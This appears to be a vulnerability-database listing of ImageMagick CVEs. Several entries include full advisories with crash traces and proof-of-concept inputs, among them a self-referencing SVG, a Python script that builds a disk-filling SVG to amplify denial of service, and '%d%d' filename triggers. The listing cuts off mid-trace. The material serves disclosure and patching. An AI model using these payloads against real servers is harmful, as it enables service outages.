VCID-6h7x-3rue-kucp ImageMagick has a heap buffer over-read via 32-bit integer overflow in MAT decoder In MAT decoder uses 32-bit arithmetic due to incorrect parenthesization resulting in a heap over-read. ``` ================================================================= ==969652==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x506000003b40 at pc 0x555557b2a926 bp 0x7fffffff4c80 sp 0x7fffffff4c70 READ of size 8 at 0x506000003b40 thread T0 ``` CVE-2026-28692
GHSA-mrmj-x24c-wwcv
VCID-6hay-bjuv-nygd security update CVE-2017-15277
VCID-6jnv-nnkm-v7a3 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14060
VCID-6jvf-8pfe-m3cn ImageMagick: Memory leak in the ReadICONImage function CVE-2017-8765
VCID-6kep-3ygd-hkbn security update CVE-2017-14682
VCID-6nrh-wh65-nben ImageMagick: denial of service flaw in PDB file processing CVE-2015-8902
VCID-6qqv-wf7w-xfaf ImageMagick: heap-based buffer overflow at MagickCore/pixel-accessor.h in SetPixelViaPixelInfo because of a MagickCore/enhance.c error CVE-2019-13298
VCID-6t7d-2hre-sqbw ImageMagick has XMP profile write that triggers hang due to unbounded loop ### Summary Infinite lines occur when writing during a specific XMP file conversion command ### Details ``` #0 GetXmpNumeratorAndDenominator (denominator=<optimized out>, numerator=<optimized out>, value=<optimized out>) at MagickCore/profile.c:2578 #1 GetXmpNumeratorAndDenominator (denominator=<synthetic pointer>, numerator=<synthetic pointer>, value=720000000000000) at MagickCore/profile.c:2564 #2 SyncXmpProfile (image=image@entry=0x555555bb9ea0, profile=0x555555b9d020) at MagickCore/profile.c:2605 #3 0x00005555555db5cf in SyncImageProfiles (image=image@entry=0x555555bb9ea0) at MagickCore/profile.c:2651 #4 0x0000555555798d4f in WriteImage (image_info=image_info@entry=0x555555bc2050, image=image@entry=0x555555bb9ea0, exception=exception@entry=0x555555b7bea0) at MagickCore/constitute.c:1288 #5 0x0000555555799862 in WriteImages (image_info=image_info@entry=0x555555bb69c0, images=<optimized out>, images@entry=0x555555bb9ea0, filename=<optimized out>, exception=0x555555b7bea0) at MagickCore/constitute.c:1575 #6 0x00005555559650c4 in CLINoImageOperator (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe "-write", arg1n=arg1n@entry=0x7fffffffe2c7 "a.mng", arg2n=arg2n@entry=0x0) at MagickWand/operation.c:4993 #7 0x0000555555974579 in CLIOption (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe "-write") at MagickWand/operation.c:5473 #8 0x00005555559224aa in ProcessCommandOptions (cli_wand=cli_wand@entry=0x555555b85790, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, index=index@entry=1) at MagickWand/magick-cli.c:758 #9 0x000055555592276d in MagickImageCommand (image_info=image_info@entry=0x555555b824a0, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=metadata@entry=0x7fffffffbc10, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:1392 #10 0x00005555559216a0 in MagickCommandGenesis (image_info=image_info@entry=0x555555b824a0, command=command@entry=0x555555922640 <MagickImageCommand>, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=0x0, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:177 #11 0x000055555559f76b in MagickMain (argc=3, argv=0x7fffffffdfa8) at utilities/magick.c:162 #12 0x00007ffff700fd90 in __libc_start_call_main (main=main@entry=0x55555559aec0 <main>, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8) at ../sysdeps/nptl/libc_start_call_main.h:58 #13 0x00007ffff700fe40 in __libc_start_main_impl (main=0x55555559aec0 <main>, argc=3, argv=0x7fffffffdfa8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf98) at ../csu/libc-start.c:392 #14 0x000055555559f535 in _start () ``` ``` static void GetXmpNumeratorAndDenominator(double value, unsigned long *numerator,unsigned long *denominator) { double df; *numerator=0; *denominator=1; if (value <= MagickEpsilon) return; *numerator=1; df=1.0; while(fabs(df - value) > MagickEpsilon) { if (df < value) (*numerator)++; else { (*denominator)++; *numerator=(unsigned long) (value*(*denominator)); } df=*numerator/(double)*denominator; } } ``` In this code, the loop `while(fabs(df - value) > MagickEpsilon)` keeps repeating endlessly. ### PoC `magick hang a.mng` https://drive.google.com/file/d/1iegkwlTjqnJTtM4XkiheYsjKsC6pxtId/view?usp=sharing ### Impact XMP profile write triggers hang due to unbounded loop ### credits **Team Pay1oad DVE** **Reporter** : **Shinyoung Won** (with contributions from **WooJin Park, DongHa Lee, JungWoo Park, Woojin Jeon, Juwon Chae**, **Kyusang Han, JaeHun Gou**) **yosimich(@yosiimich**) **Shinyoung Won** of SSA Lab e-mail : [yosimich123@gmail.com] **Woojin Jeon** Gtihub : brainoverflow e-mail : [root@brainoverflow.kr] **WooJin Park** GitHub : jin-156 e-mail : [1203kids@gmail.com] **Who4mI(@GAP-dev) Lee DongHa of SSA Lab** Github: GAP-dev e-mail : [ceo@zeropointer.co.kr] **JungWoo Park** Github : JungWooJJING e-mail : [cuby5577@gmail.com] **Juwon Chae** Github : I_mho e-mail : [wndnjs4698@naver.com] **Kyusang Han** Github : T1deSEC e-mail : [hksjoe0081@gmail.com] **JaeHun Gou** Github : P2GONE e-mail : [charly20@naver.com] ### Commits Fixed in: https://github.com/ImageMagick/ImageMagick/commit/229fa96a988a21d78318bbca61245a6ed1ee33a0 and https://github.com/ImageMagick/ImageMagick/commit/38631605e6ab744548a561797472cf8648bcfe26 CVE-2025-53015
GHSA-vmhh-8rxq-fp9g
VCID-6vvv-g1fm-4bdn ImageMagick: Specially crafted SVG leads to segmentation fault and generate trash files in "/tmp", possible to leverage DoS ### Summary Specially crafted SVG file make segmentation fault and generate trash files in "/tmp", possible to leverage DoS. ### Operating system, version and so on Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara) ### Tested ImageMagick version 6.9.11-60, 7.1.0-62 ### Details A specially created SVG file that loads by itself and make segmentation fault. Remote attackers can take advantage of this vulnerability to cause a denial of service of the generated SVG file. It seems that this error affects a lot of websites and causes a generating trash files in ```/tmp``` when uploading this PC file to the server. I think it's better to check the file descriptor coming from itself before executing ```read()```. ### PoC 1. Generate SVG file: ```<?xml version="1.0" standalone="yes"?> <!DOCTYPE test> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <image height="200" width="200" xlink:href="bad.svg" /> </svg> ``` 2. Run some commands for verification: ```$rm -f /tmp/* $./magick --version Version: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.5) Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib Compiler: gcc (7.5) $./magick convert -verbose -font OpenSymbol bad.svg t.jpg 'inkscape' '/tmp/magick-ixX13JwrwrLUhyucKsGxechsQtEN4Zji' --export-filename='/tmp/magick-qp154V6U-dyAwtU-QbcnWD8XKFcG7q5k.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-YWdlPJt-_9BfRq0uY2vmza_VOxWfjyvl' 2>&1 Segmentation fault $ls /tmp magick-1iZstE-dzlzQTN4HkWX_JlakXXtH4IEM magick-GeFwj8Be_wISDLJnsr4s5WC7p079pzXN magick-s7QN2tTaiXEr9KmkbkHdmtfmgrnjFRaM magick-1LG0ND-RZMQOG8xizDHd-qdd6_Fu70YP magick-ggORXwnSivWesH2gthhafuLTVw7TLqwP magick-s835rBXZIGK5bkp3ijKoMTCbcyWza3ON magick-25byX_oEeEr2dWIkr9nyEoVz1MHC2n9M magick-GrRg60fY1LOv4uUhqD16AaEcL6rWtNeN magick-siS7QS_av31X63ENYmecytIjx1iKmWAN magick-2Dj7LuLUHF6Y93mZ9ZT8a5taf7b5Hb9O magick-gTQUBafZIaI1n8q-QXOwOvyc6qv3tolN magick-SIXvVjWVvDhX1w5NL9K6owJtO0CgG3NN magick-2GrJuPlQjwGwsTK8I1aTMxg90h8PeK4M magick-hik3AU_2x0D_R8ViIBXUIuRljCXSmgqO magick-sJhO2Yv_aeKsxt1JxDENKIiQqkOkSfwM magick-2QIFnR9e-fYRFevd1-vQ-bSk0I1VOAsO magick-HJ18uyG3HLvEftNcMqCEJ5LKwi12CQgO magick-SNgGdhyKjp5TZZQmWqioLEcyQ8vMzG3O magick-2rEueYW0PIXGxE1zHm3LsGedMW2KLdgP magick-hUaNDJgYfzTzJes4QlnLwaYh2fcaOWgQ magick-SxLBCSdKVHSQOrjohe4WFyLHaPOyDUiP magick-2uRqbAjqkXXMMGQHpw8WG18lnDHaRd3N magick-_HWqrSdj_ihWMzjJ_eRiAkKbgrIljhUM magick-t02HQvZSsYLzmJesC2Mpjp5OL3zN4A5P magick-3dPT4h0HzM6ZqCwpGEB69e27pZhHbfHP magick-iEMFbMc2VvGj067miVskUC-mxOveGpqO magick-T4kTJGu-6wF60OOIHOB5tKO63NW5qTTL magick-3SVSiI4Yg_eQ01ZZV8lZsBM_MhauuwpO magick-InCjmKQ7uSGizlJFOZz9Vo3Ax1yvLy5L magick-TGIY7l3-dNVdAbGaMIbN0z3YGy5mrNvM magick-3WQIQghdu9-YHVasNASfkkU63yyVdmfO magick-IPu9YWX3Lk96EkP63KLqQ-CX6020cZMN magick-Thg6M-CqdcXc0SyjRdYm19rtVBLt2U6P magick-4hLf4JPIes67QpGP7GfmOPftGvENC1aN magick-IVKuPYBpBe6Lx9F3lLMAMCjIptMoz0ZM magick-TiTtPZdT3Zgsd-pasyRFTb-DbLGNqJTO magick-4tTMAJrCHh2E8M1xw5BIjx8UDyb42FWM magick-IVzovwQiOR2fwJDO5E5RZb58apCPBX8M magick-_TQZIwyyLufZWMVx1-k3YLSYSsGl6upM magick-4xs5mqt95PYGrXXxZiwyYHFKREC0NEWL magick-J36psEABfkKfgVQdeFsptbkRWT0b1uNP magick-tzMg0NWi-_GQOzES2aPMPRqCk-bgjyVN magick-5DmloHI-m-WPROyfQmm5cF8GOEVa5EqO magick-jEq-Q6t6D3CU-eevjhgfjU_LPP3pOEoO magick-ULNarZD53mUqpJrHZVeZw5x0cuUH683N magick-5JvQUY2vVq_kpzhfUTcsxao_YB2WImZN magick-jNiokVz_0Iifz5QX3a9AUIUOBoxfJ49P magick-uLR13qPG6X-c3avLRypLJ-C7-UiUH9tM magick-5NoXNg55Xyh8816ksKEcqreuN1BF93LO magick-jwa4IVvrxrE4OTSA0m8iB2W3K5LiinmQ magick-uW9khwJZfM4EH1cETVDv09QnueONQGPP magick-60BRKi88--TOk-Sp8t5nAyAxjSuOpxfO magick-K5mhLUCkx0WJxcWr7G7oT0nNrc5qBvgQ magick-v4l3nLHBXBjCNc-nTHSTwUOEfsNCUMnP magick-6t2qB_JnplYLZZo5thj6PV0R15LrPe4L magick-K5qzx3k8-36H5wfEgl3Jy1oNpOyscHhN magick-v7Xm_e5JIf4lCC_CwXJkIuQNHEE7D1LM magick-6_UmuyWO8OviaajA92_VeD1bK8z0btAO magick-K6-l4o2PkC4V7Nq_IJ9y-ifJLl6lSzdM magick-vd7xpM8OrXvu3Oftqd7xdRmGDdoGcHrP magick-725dkkTfpkfKmogI4WLWWwCbrxc0aysP magick-KchLIwf4-ahsUq1FsJfK58j3Jb6CAMTP magick-VhfNmWGF-AOhytm1DMGG8n1DLOAG3p1N magick-7rZG_PFyH2Q7ibxFrB4kTQZjkihhU9uO magick-kpcUuOTI4UlrK8kHoZh38ziLMmBjtjvO magick-vHp_Pz6BixbqmYCq_D2zs2sU4hFRbQoP magick--7T1tmKSEJSSPJIgeDEQ9PLdo8oPh60P magick-kReWGvubeCrLdw4RcRsJdJhlV43wCffM magick-VLoWnTJppgO7-ivh0q_uuGcgPDkuyKPN magick-8jBguKQr6qeZTsw4eFbQWO34ndlsBpbO magick-LBjQNSTFFpLRnj3Cldvjm5e_PWYL1fLL magick-Vp_vOIJK-XsFRZeAS1ZJ9Ra2vkgJbCOL magick-9Hno6LBapbL0jw_CSEC7Ua6A7kB3uYiN magick-Lfu-5C1697AwNxTZnljfR24E2_7ZDnwP magick-VpzT9KMjKbomi6mV3ZnnRkoq1WAP41vM magick-9SN2401usIEYCc6zcn442pdvqyVdPWaQ magick-lHxUfKDHYSfpVi7yOc31u7gJVTXLhSuN magick-vRG2_rcf6I8lB2MJF6DqHqh2_z21IP5N magick-a1uVHLsbEnA8yXKvwmW3PWAFBdnfoSnQ magick-M4mcsykxHPNkFTDgc4tdJ9kP1Trkm64M magick-vw2VNrClFVhnXLqVoIz35Xpo232qsngN magick-AbpJUZcspor3bkYr70l17bGSjntyAhZP magick-m5P0dZWaFUeZo4kr8HcO6vpfuICmmBcM magick-WEYdL0amRHxeCpuGiFEuulRwwzkjZyXO magick-Acsy_QEmT-x7nE6DvfIv2pqjLbfJYTtN magick-MHI0zAFGR1-ljbFLl12i5hFVpkoBbdpN magick-WKjEe_jTF4V6Jt_kCbFEy2B6kQcyFseQ magick-Ai76_QfTBT0DXjGqvZ_aAGia_gvAxuGM magick-mOckd_uEYCLc9gy1XwVgtJWpr1aDU7QP magick-WkkwqgsnNNSleWlRm-1BN8RiE-QcF9lO magick-albf_l7tU2ASh6PRhnMWBDscz31fS1BO magick-MrajCpsti_3MlAWlNviDCY3iUeZsgGLM magick-WMlxV7rdjtMYe1F0aggQZW2WNpvhY2GO magick-A-nsLcvOOBlHzdBGQMSsdTrvsfUevEQO magick-mZyca0hC8atGLvY-m0UYec1yCU3rGIWM magick-wnqAodNT7ZVbe8dIN-Gd2pxCNo6cwzOL magick-AplCAOC7_K6cDM3qO3wqSONMhVuztohO magick-NAH0CgD3XCLMS1VN_-4yju-2RCdFJbGO magick-wP3Q3aM05wB2K6NBolzm6sC_R3b5wE1P magick-ApNw8tmuaXUw-mqdMF7P0ZKOV3YHwQGM magick-NU3oGX5NxUhJvWQ_WWY8-7BNAnHWJceM magick-wsCa-R-K6HYtZ7FWWnPg3FpOyGmS1wuO magick-AWye85xaEc_t6rGB9bIvIz9BBhrRyg3O magick-NZBKgJGx7bH8uZ2PiKF8jtzCI9aBDVZN magick-WvNjMMQ2gXHSGNWCMceMqBL8ksnGZIuO magick-aXtmFaHIdz24xjFvCy4ZQda2wef0AH0N magick-o3FerPGSptnb0U5mHu6DH-00ZTlTlDCO magick-xAPfisi5E9NHJKbkrbCGioXCkTs3uDYM magick-B5uiXH3Mrf0GgmF9NAPwqSJd-lMFLfrM magick-o4Dl5iYn3veI54-lNtHgm6wnAIQ79urP magick-Xb2irJZuxzYWsCfmYHc8oaKU67ANR27N magick-BEr6_VZecWKFCRVuSXPEIbJu6uuBe0pO magick-o9S5taGlSrED8zUEtv0EkpjoWk61fJBO magick-Xkes-Q_QqXhMthGwFKxLjpRvL96qRd6O magick-bKCtVcSkQqtXdjO8X_AyWeocMsYuZArN magick-OeHngPf0pRuDH9DpIs_OpkoAbDnAvBTL magick-xlhsal9kyY6QMOSb1WmyTx1vGTqE94bO magick-Btw2-hfTAVQLiPRMXakrXs_UhstT2ZGM magick-OhD82cIFbY91zGxpIt52AbjWekddAU2L magick-xmmr39PvOExl0B8w0YO_oq2_yYyWoVLM magick-By2_pnDUxk85bO3M7kkMbAEXHGShyc0O magick-OlcHbZjE_-66xMyWVlhfAucxYJioiQ4L magick-xq9qw9wK-TRFokBTostne36jQXljCa7M ... ``` ### Impact Possible DOS, because when ImageMagick crashes it generates a lot of trash files. This trash file can be large, if SVG file contains many render action. ### Additional impact In DOS attack if remount attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. This means that if an attacker uploads a 100 M SVG, the server will generate about 10 G. Example: ``` $cat dos_poc.py open("bad_dos.svg", "w").write("""<?xml version="1.0"?> <?xml-stylesheet href="https://example.com/style.xsl" type="text/xsl" ?> <!DOCTYPE test> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <image height="200" width="200" href="bad_dos.svg&quot;""" + "0"*(1024*1021) + """&quot;" /> </svg>""") $rm -rf /tmp/magick-* $python3 dos_poc.py $du -h bad_dos.svg 1,0M bad_dos.svg $../magick convert -font OpenSymbol bad_dos.svg t.jpg Segmentation fault $cat /tmp/magick-* > dos_k.txt $du -h dos_k.txt 103M dos_k.txt ``` P. S. If ImageMagick will work in Docker container this attack will crash server where docker running. Because the size of the docker container will increase. CVE-2023-1289
GHSA-j96m-mjp6-99xr
VCID-6wy3-xwez-vfej security update CVE-2018-16412
VCID-6y99-sgwe-tygw ImageMagick: outside the range of representable values of type 'long' and integer overflow at MagickCore/pixel.c and MagickCore/cache.c CVE-2020-25676
VCID-6yn4-p8f4-pbh1 ImageMagick: Memory leak in the function ReadMATImage CVE-2017-12672
VCID-6zuv-uh18-k3c1 security update CVE-2019-13307
VCID-72e3-s3pn-gbe5 security update CVE-2016-7539
VCID-73j4-24p8-pbe5 security update CVE-2017-11524
VCID-74ak-g3rw-xygd security update CVE-2016-5687
VCID-75nc-a6rr-g3f6 security update CVE-2016-7527
VCID-784p-34mz-vucz ImageMagick has a Memory Leak in magick stream ## Summary In ImageMagick's `magick stream` command, specifying multiple consecutive `%d` format specifiers in a filename template causes a memory leak. ## Details - **Vulnerability Type:** Memory leak - **Affected Version:** ImageMagick 7.1.1-47 (as of commit 82572afc, June 2025) ## Reproduction ### Tested Environment - **Operating System:** Ubuntu 22.04 LTS - **Architecture:** x86_64 - **Compiler:** gcc with AddressSanitizer (gcc version: 11.4.0) ### Reproduction Steps ```bash # Clone source git clone --depth 1 --branch 7.1.1-47 https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.1 cd ImageMagick-7.1.1 # Build with ASan CFLAGS="-g -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" LDFLAGS="-fsanitize=address" ./configure --enable-maintainer-mode --enable-shared && make -j$(nproc) && make install # Trigger crash ./utilities/magick stream %d%d a a ``` ### Output ``` $ magick stream %d%d a a stream: no decode delegate for this image format `' @ error/constitute.c/ReadImage/746. stream: missing an image filename `a' @ error/stream.c/StreamImageCommand/755. ================================================================= ==114==ERROR: LeakSanitizer: detected memory leaks Direct leak of 152 byte(s) in 1 object(s) allocated from: #0 0x7fc4ebe58887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 #1 0x7fc4eb563c5c in AcquireMagickMemory MagickCore/memory.c:559 #2 0x7fc4eb563c82 in AcquireCriticalMemory MagickCore/memory.c:635 #3 0x7fc4eb60c2be in AcquireQuantumInfo MagickCore/quantum.c:119 #4 0x7fc4eb6b6621 in StreamImage MagickCore/stream.c:1335 #5 0x7fc4eb09d889 in StreamImageCommand MagickWand/stream.c:292 #6 0x7fc4eaf1295d in MagickCommandGenesis MagickWand/magick-cli.c:177 #7 0x55a34f7c0a0c in MagickMain utilities/magick.c:153 #8 0x55a34f7c0cba in main utilities/magick.c:184 #9 0x7fc4ea38fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7fc4ebe5957c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226 #1 0x7fc4eb680e2f in AcquireSemaphoreMemory MagickCore/semaphore.c:154 #2 0x7fc4eb680f30 in AcquireSemaphoreInfo MagickCore/semaphore.c:200 #3 0x7fc4eb60d38d in GetQuantumInfo MagickCore/quantum.c:435 #4 0x7fc4eb60c30e in AcquireQuantumInfo MagickCore/quantum.c:121 #5 0x7fc4eb6b6621 in StreamImage MagickCore/stream.c:1335 #6 0x7fc4eb09d889 in StreamImageCommand MagickWand/stream.c:292 #7 0x7fc4eaf1295d in MagickCommandGenesis MagickWand/magick-cli.c:177 #8 0x55a34f7c0a0c in MagickMain utilities/magick.c:153 #9 0x55a34f7c0cba in main utilities/magick.c:184 #10 0x7fc4ea38fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 SUMMARY: AddressSanitizer: 216 byte(s) leaked in 2 allocation(s). ``` ### Commits Fixed in https://github.com/ImageMagick/ImageMagick/commit/fc3ab0812edef903bbb2473c0ee652ddfd04fe5c and https://github.com/ImageMagick/ImageMagick6/commit/d49460522669232159c2269fa64f73ed30555c1b CVE-2025-53019
GHSA-cfh4-9f7v-fhrc
VCID-78zg-am5w-gugh security update CVE-2018-12600
VCID-79w4-fqmh-j3bk ImageMagick: Memory leak in the ReadMATImage function CVE-2017-14326
VCID-7bjy-zdas-9yfv security update CVE-2016-10047
VCID-7cbm-nm6u-8kdp ImageMagick: out-of-bounds read in enhance.c CVE-2016-6520
VCID-7dh9-2g6c-6qhg ImageMagick: Memory leak in the ReadJNGImage function CVE-2017-9262
VCID-7dqc-1d5h-uybs Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-11724
VCID-7eeu-wtkq-dyc1 ImageMagick: Memory leak in WriteMAPImage function in coders/map.c CVE-2017-12663
VCID-7f35-ha1p-bbby ImageMagick: heap-based buffer overflow in TIFFGetProfiles in coders/tiff.c CVE-2020-25667
VCID-7fmu-6e6q-r7hd security update CVE-2016-5118
VCID-7fw6-fzyj-7qf3 security update CVE-2018-16645
VCID-7gya-qyjx-qqfx imagemagick: null-pointer dereference in function ReadPANGOImage in coders/pango.c and ReadVIDImage in coders/vid.c causing denial of service CVE-2019-12974
VCID-7hxc-bmqq-pyf3 security flaw CVE-2005-4601
VCID-7jvc-54zg-pbcz ImageMagick: Memory leak in the WriteJP2Image() function CVE-2017-11536
VCID-7jx8-htkz-7qd4 security update CVE-2018-16644
VCID-7kza-xvmr-sqhe security update CVE-2016-10048
VCID-7mqx-nap6-97cr ImageMagick: out of memory crash in magick/cache.c CVE-2014-9838
VCID-7pyx-kb1k-wufg ImageMagick: out of bound issue in rle file CVE-2014-9844
VCID-7t1t-1spz-gfee ImageMagick has a heap-buffer-overflow ### Summary While Processing a crafted TIFF file, imagemagick crashes. ### Details Following is the imagemagick version: ``` imagemagick_git/build_26jun23/bin/magick --version Version: ImageMagick 7.1.1-13 (Beta) Q16-HDRI x86_64 56f478940:20230625 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI Delegates (built-in): fontconfig freetype jbig jng jpeg lcms lzma pangocairo png tiff webp x xml zlib Compiler: gcc (4.2) ``` ### PoC issue can be replicated with following command with provided POC file(sent over email): ```bash magick poc.tiff /dev/null ``` ### Impact This can lead to application crash. ### Credits Please give credits to Hardik shah of Vehere (Dawn Treaders team) CVE-2025-68469
GHSA-fff3-4rp7-px97
VCID-7vrs-x5dn-sbcm ImageMagick: Memory leak in the function ReadOneMNGImage CVE-2017-12673
VCID-7wrg-6pw1-nucx security update CVE-2016-5239
VCID-7ynu-qf57-ykba ImageMagick: memory leak in the XMagickCommand function in MagickCore/animate.c CVE-2018-13153
VCID-7yur-twpa-n3e1 ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled CVE-2019-13295
VCID-834e-c7gn-afac ImageMagick: Division by zero in ScaleResampleFilter in MagickCore/resample.c CVE-2021-20246
VCID-85ny-1w5w-57aq ImageMagick: Memory leak in ReadSVGImage CVE-2017-7943
VCID-872v-6z75-jucm security update CVE-2017-11639
VCID-884z-9tnu-kfa5 security update CVE-2016-10071
VCID-8862-dh13-hyga ImageMagick: use after free in ReadMATImage function in coders/mat.c CVE-2018-11624
VCID-887b-1pwe-nqdd ImageMagick: infinite loop DoS in vision.c CVE-2014-9804
VCID-8an6-y8xy-pyf3 ImageMagick: NULL pointer dereference in CheckEventLogging function in MagickCore/log.c CVE-2018-16328
VCID-8b34-juwg-pkcb GraphicsMagick improperly handles PALM and DCM images, potentially resulting in the execution of arbitrary code. CVE-2006-5456
VCID-8bac-p2pq-vkf1 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-2719
VCID-8drx-cw3m-dufq security update CVE-2016-10059
VCID-8fa4-9jsh-3bh9 Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-3717
VCID-8gvq-1vk8-17bx ImageMagick: out of bound access in viff image CVE-2014-9816
VCID-8j37-fwz2-bfea ImageMagick: Memory leak vulnerability in WritePICTImage function in coders/pict.c CVE-2017-12665
VCID-8jgu-2tx3-gkcb ImageMagick: Memory leak in ReadPICTImage function in coders/pict.c CVE-2017-12654
VCID-8n3f-ass1-97gj ImageMagick: Memory Leak in ReadRLAImage in coders/rla.c CVE-2018-5247
VCID-8v7y-kcz2-bbb9 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-15281
VCID-8yfc-gunh-17a2 ImageMagick: division by zero in OptimizeLayerFrames function in MagickCore/layer.c CVE-2020-27560
VCID-8zt8-za5g-s7e6 security update CVE-2016-7529
VCID-92es-dtbz-tqae ImageMagick: Division by zero in GetResizeFilterWeight in MagickCore/resize.c CVE-2021-20243
VCID-93a6-7956-v3ar ImageMagick: NULL pointer dereference in the AcquireResampleFilterThreadSet function CVE-2017-14739
VCID-93em-sxxc-j3ep ImageMagick: Memory exhaustion in ReadMPCImage in coders/mpc.c CVE-2017-12430
VCID-93mt-5yvb-zfga ImageMagick: heap-based buffer overflow in WriteTIFFImage in coders/tiff.c CVE-2019-15141
VCID-98sh-zs45-hyag ImageMagick: out of bound access on malformed sun file CVE-2014-9818
VCID-99f6-k1y9-x7ba security update CVE-2017-11505
VCID-9akb-t56u-4yhr security update CVE-2017-10928
VCID-9ark-hra3-zyh9 ImageMagick: Heap-based buffer over-read in coders/webp.c:IsWEBPImageLossless() CVE-2018-9135
VCID-9cmk-p7za-wqds ImageMagick: Incorrect EOF handling in coders/rle.c CVE-2017-9144
VCID-9ewm-6688-kkar ImageMagick has a Stack Buffer Overflow in image.c Hi, we have found a stack buffer overflow and would like to report this issue. Could you confirm if this qualifies as a security vulnerability? I am happy to provide any additional information needed. ## Summary In ImageMagick's `magick mogrify` command, specifying multiple consecutive `%d` format specifiers in a filename template causes internal pointer arithmetic to generate an address below the beginning of the stack buffer, resulting in a stack overflow through `vsnprintf()`. ### Additional information Upon further investigation, we found that the same issue occurs not only with mogrify but also with the following subcommands: compare, composite, conjure, convert, identify, mogrify, and montage. Furthermore, we confirmed that this vulnerability has the potential to lead to RCE. RCE is possible when ASLR is disabled and there is a suitable one_gadget in libc, provided that options and filenames can be controlled. ## Details - **Vulnerability Type:** CWE-124: Buffer Underwrite - **Affected Component:** MagickCore/image.c - Format processing within InterpretImageFilename() - **Affected Version:** ImageMagick 7.1.1-47 (as of commit 82572afc, June 2025) - **CWE-124: Buffer Underwrite:** A vulnerability where writing occurs to memory addresses before the beginning of a buffer. This is caused by a design flaw in fixed offset correction, resulting in negative pointer arithmetic during consecutive format specifier processing. ## Reproduction ### Tested Environment - **Operating System:** Ubuntu 22.04 LTS - **Architecture:** x86_64 - **Compiler:** gcc with AddressSanitizer (gcc version: 11.4.0) ### Reproduction Steps ```bash # Clone source git clone --depth 1 --branch 7.1.1-47 https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.1 cd ImageMagick-7.1.1 # Build with ASan CFLAGS="-g -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" LDFLAGS="-fsanitize=address" ./configure --enable-maintainer-mode --enable-shared && make -j$(nproc) && make install # Trigger crash ./utilities/magick mogrify %d%d ``` ### Output ```plaintext ==4155==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda834caae at pc 0x7f1ea367fb27 bp 0x7ffda834b680 sp 0x7ffda834ae10 WRITE of size 2 at 0x7ffda834caae thread T0 #0 0x7f1ea367fb26 in __interceptor_vsnprintf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1668 #1 0x7f1ea2dc9e3e in FormatLocaleStringList MagickCore/locale.c:470 #2 0x7f1ea2dc9fd9 in FormatLocaleString MagickCore/locale.c:495 #3 0x7f1ea2da0ad5 in InterpretImageFilename MagickCore/image.c:1696 #4 0x7f1ea2c6126b in ReadImages MagickCore/constitute.c:1051 #5 0x7f1ea27ef29b in MogrifyImageCommand MagickWand/mogrify.c:3858 #6 0x7f1ea278e95d in MagickCommandGenesis MagickWand/magick-cli.c:177 #7 0x560813499a0c in MagickMain utilities/magick.c:153 #8 0x560813499cba in main utilities/magick.c:184 #9 0x7f1ea1c0bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #10 0x7f1ea1c0be3f in __libc_start_main_impl ../csu/libc-start.c:392 #11 0x560813499404 in _start (/root/workdir/ImageMagick/utilities/.libs/magick+0x2404) Address 0x7ffda834caae is located in stack of thread T0 at offset 62 in frame #0 0x7f1ea2c60f62 in ReadImages MagickCore/constitute.c:1027 This frame has 2 object(s): [32, 40) 'images' (line 1033) [64, 4160) 'read_filename' (line 1029) <== Memory access at offset 62 underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1668 in __interceptor_vsnprintf Shadow bytes around the buggy address: 0x100035061900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100035061910: 00 00 00 00 00 00 00 